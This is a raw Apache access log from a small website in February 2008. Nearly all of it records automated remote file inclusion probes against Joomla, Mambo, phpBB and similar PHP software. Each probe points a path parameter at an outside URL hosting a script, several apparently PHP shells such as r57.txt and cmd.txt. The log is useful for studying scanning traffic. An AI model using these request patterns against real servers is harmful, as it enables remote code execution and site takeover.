193.95.220.30 - - [24/Feb/2008:17:11:59 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.25.27 - - [24/Feb/2008:17:15:26 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
72.30.216.8 - - [24/Feb/2008:17:15:26 -0800] "GET /logs/access.log HTTP/1.0" 200 50001 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
85.17.200.74 - - [24/Feb/2008:17:15:45 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
190.54.32.131 - - [24/Feb/2008:17:15:56 -0800] "GET /logs/scripts.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.kool-wallpapers.com//photos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.95.220.30 - - [24/Feb/2008:17:16:29 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
193.95.220.30 - - [24/Feb/2008:17:16:30 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
193.95.220.30 - - [24/Feb/2008:17:16:30 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
193.95.220.30 - - [24/Feb/2008:17:16:41 -0800] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.95.220.30 - - [24/Feb/2008:17:16:41 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.56.111.194 - - [24/Feb/2008:17:18:20 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
195.56.111.194 - - [24/Feb/2008:17:18:20 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
195.56.111.194 - - [24/Feb/2008:17:18:20 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
195.56.111.194 - - [24/Feb/2008:17:18:43 -0800] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.194 - - [24/Feb/2008:17:18:43 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.103.136.225 - - [24/Feb/2008:17:18:53 -0800] "GET /logs/access.log//?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
201.103.136.225 - - [24/Feb/2008:17:18:59 -0800] "GET /logs//?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 200 6234 "-" "libwww-perl/5.805" "galf.org"
87.237.123.245 - - [24/Feb/2008:17:19:34 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
87.237.123.245 - - [24/Feb/2008:17:19:34 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
87.237.123.245 - - [24/Feb/2008:17:19:34 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
212.122.68.50 - - [24/Feb/2008:17:19:53 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
212.122.68.50 - - [24/Feb/2008:17:19:53 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
212.122.68.50 - - [24/Feb/2008:17:19:53 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
87.237.123.245 - - [24/Feb/2008:17:20:05 -0800] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.237.123.245 - - [24/Feb/2008:17:20:05 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.122.68.50 - - [24/Feb/2008:17:21:01 -0800] "GET /logs/access_070917.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.122.68.50 - - [24/Feb/2008:17:21:01 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.122.68.50 - - [24/Feb/2008:17:21:01 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.216.205.192 - - [24/Feb/2008:17:22:09 -0800] "GET /logs/access_071014.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.felipeftp.t35.com/cmd/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.216.205.192 - - [24/Feb/2008:17:22:09 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.felipeftp.t35.com/cmd/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.74.120.24 - - [24/Feb/2008:17:22:53 -0800] "GET /logs/access_080114.log//?baseDir=http://www.karitasi.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.74.120.24 - - [24/Feb/2008:17:22:53 -0800] "GET //?baseDir=http://www.karitasi.extra.hu/id.txt?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
201.74.120.24 - - [24/Feb/2008:17:22:54 -0800] "GET /logs//?baseDir=http://www.karitasi.extra.hu/id.txt?? HTTP/1.1" 200 6234 "-" "libwww-perl/5.805" "www.galf.org"
124.32.128.178 - - [24/Feb/2008:17:24:22 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
124.32.128.178 - - [24/Feb/2008:17:24:23 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
124.32.128.178 - - [24/Feb/2008:17:24:23 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
124.32.128.178 - - [24/Feb/2008:17:24:50 -0800] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
124.32.128.178 - - [24/Feb/2008:17:24:51 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
150.164.211.202 - - [24/Feb/2008:17:26:46 -0800] "GET /logs/access.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.ownar.xpg.com.br/bot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
150.164.211.202 - - [24/Feb/2008:17:26:46 -0800] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://www.ownar.xpg.com.br/bot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
150.164.211.202 - - [24/Feb/2008:17:26:47 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.ownar.xpg.com.br/bot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
81.91.66.79 - - [24/Feb/2008:17:28:28 -0800] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.91.66.79 - - [24/Feb/2008:17:28:28 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.235.217.202 - - [24/Feb/2008:17:30:04 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
213.235.217.202 - - [24/Feb/2008:17:30:04 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
213.235.217.202 - - [24/Feb/2008:17:30:04 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
213.235.217.202 - - [24/Feb/2008:17:30:39 -0800] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.235.217.202 - - [24/Feb/2008:17:30:40 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.89.224.76 - - [24/Feb/2008:17:31:04 -0800] "GET /logs/access_080218.log HTTP/1.0" 200 3646185 "-" "Wget/1.10.2" "galf.org"
67.195.58.174 - - [24/Feb/2008:17:32:13 -0800] "GET /logs/access_080114.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
195.177.226.178 - - [24/Feb/2008:17:32:17 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
77.222.131.65 - - [24/Feb/2008:17:32:22 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
77.222.131.65 - - [24/Feb/2008:17:32:22 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
213.250.2.37 - - [24/Feb/2008:17:33:40 -0800] "GET /logs/myevent.php?myevent_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
213.250.2.37 - - [24/Feb/2008:17:33:42 -0800] "GET /myevent.php?myevent_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
63.164.1.13 - - [24/Feb/2008:17:33:42 -0800] "GET /logs/access.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "galf.org"
63.164.1.13 - - [24/Feb/2008:17:33:42 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "galf.org"
63.164.1.13 - - [24/Feb/2008:17:33:42 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "galf.org"
67.195.58.179 - - [24/Feb/2008:17:34:06 -0800] "GET /logs/access.log HTTP/1.0" 200 63611 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
72.36.216.106 - - [24/Feb/2008:17:34:32 -0800] "GET /logs//tags.php?BBCodeFile=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.galf.org"
67.195.45.207 - - [24/Feb/2008:17:36:12 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.117.225.155 - - [24/Feb/2008:17:37:35 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
87.117.225.155 - - [24/Feb/2008:17:37:35 -0800] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
87.117.225.155 - - [24/Feb/2008:17:37:36 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
209.62.26.18 - - [24/Feb/2008:17:38:43 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
209.62.26.18 - - [24/Feb/2008:17:38:44 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
209.62.26.18 - - [24/Feb/2008:17:38:44 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
85.234.144.91 - - [24/Feb/2008:17:38:57 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
85.234.144.91 - - [24/Feb/2008:17:38:57 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
85.234.144.91 - - [24/Feb/2008:17:38:57 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
63.164.1.13 - - [24/Feb/2008:17:39:03 -0800] "GET /logs/access_070917.log/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
63.164.1.13 - - [24/Feb/2008:17:39:03 -0800] "GET /index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
63.164.1.13 - - [24/Feb/2008:17:39:03 -0800] "GET /logs/index.php?x=http://misterclear.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
209.62.26.18 - - [24/Feb/2008:17:39:05 -0800] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.26.18 - - [24/Feb/2008:17:39:06 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.234.144.91 - - [24/Feb/2008:17:39:21 -0800] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.234.144.91 - - [24/Feb/2008:17:39:21 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.200.246.89 - - [24/Feb/2008:17:39:48 -0800] "GET /logs/access_080114.log//claroline/phpbb/page_tail.php?includePath=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
209.200.246.89 - - [24/Feb/2008:17:39:48 -0800] "GET //claroline/phpbb/page_tail.php?includePath=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
209.200.246.89 - - [24/Feb/2008:17:39:48 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
205.234.132.157 - - [24/Feb/2008:17:40:10 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.216.205.192 - - [24/Feb/2008:17:40:33 -0800] "GET /logs/access_070709.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.felipeftp.t35.com/cmd/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.216.205.192 - - [24/Feb/2008:17:40:33 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.felipeftp.t35.com/cmd/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.179.98 - - [24/Feb/2008:17:40:44 -0800] "GET //claroline/phpbb/page_tail.php?includePath=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.179.98 - - [24/Feb/2008:17:40:44 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.35 - - [24/Feb/2008:17:41:20 -0800] "GET //eva/index.php3?aide=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
61.220.191.9 - - [24/Feb/2008:17:42:29 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.91.228.154 - - [24/Feb/2008:17:42:30 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "galf.org"
81.91.228.154 - - [24/Feb/2008:17:42:31 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://89.76.171.43/~pras/kppp/kppp-configure/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "galf.org"
64.49.6.12 - - [24/Feb/2008:17:44:47 -0800] "GET /logs//admin.php?include_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
64.49.6.12 - - [24/Feb/2008:17:44:47 -0800] "GET //admin.php?include_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
209.216.205.192 - - [24/Feb/2008:17:44:58 -0800] "GET /logs/access_070917.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.felipeftp.t35.com/cmd/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.194.67.52 - - [24/Feb/2008:17:46:26 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.72.181.15 - - [24/Feb/2008:17:46:42 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
203.72.181.15 - - [24/Feb/2008:17:46:42 -0800] "GET /modules/My_eGallery/index.php?basepath=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
190.11.14.84 - - [24/Feb/2008:17:47:39 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.mahpushane.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
190.11.14.84 - - [24/Feb/2008:17:47:39 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.mahpushane.com/r57.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
72.36.179.98 - - [24/Feb/2008:17:48:38 -0800] "GET /logs/access.log//claroline/phpbb/page_tail.php?includePath=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
72.36.179.98 - - [24/Feb/2008:17:48:39 -0800] "GET //claroline/phpbb/page_tail.php?includePath=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
72.36.179.98 - - [24/Feb/2008:17:48:39 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
209.200.246.89 - - [24/Feb/2008:17:48:42 -0800] "GET /logs/access.log//claroline/phpbb/page_tail.php?includePath=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "galf.org"
209.200.246.89 - - [24/Feb/2008:17:48:42 -0800] "GET //claroline/phpbb/page_tail.php?includePath=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "galf.org"
209.200.246.89 - - [24/Feb/2008:17:48:43 -0800] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "galf.org"
205.234.132.157 - - [24/Feb/2008:17:49:21 -0800] "GET /logs/access_070709.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.132.157 - - [24/Feb/2008:17:49:21 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.54.50.73 - - [24/Feb/2008:17:51:04 -0800] "GET /logs/access_070709.log/modules/My_eGallery/index.php?basepath=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.54.50.73 - - [24/Feb/2008:17:51:04 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.54.50.73 - - [24/Feb/2008:17:51:04 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.chevirex.eu/orange/contenido/external/frontend/logs/default/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.72.181.15 - - [24/Feb/2008:17:51:30 -0800] "GET /modules/My_eGallery/index.php?basepath=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "galf.org"
203.72.181.15 - - [24/Feb/2008:17:51:30 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "galf.org"
81.23.229.105 - - [24/Feb/2008:17:51:37 -0800] "GET //components/com_pollxt/languages/germani.php?mosConfig_absolute_path=http://www.leonenmarije.nl/////////////modules/isis.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
81.23.229.105 - - [24/Feb/2008:17:51:37 -0800] "GET /logs//components/com_pollxt/languages/germani.php?mosConfig_absolute_path=http://www.leonenmarije.nl/////////////modules/isis.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
66.151.162.98 - - [24/Feb/2008:17:51:38 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
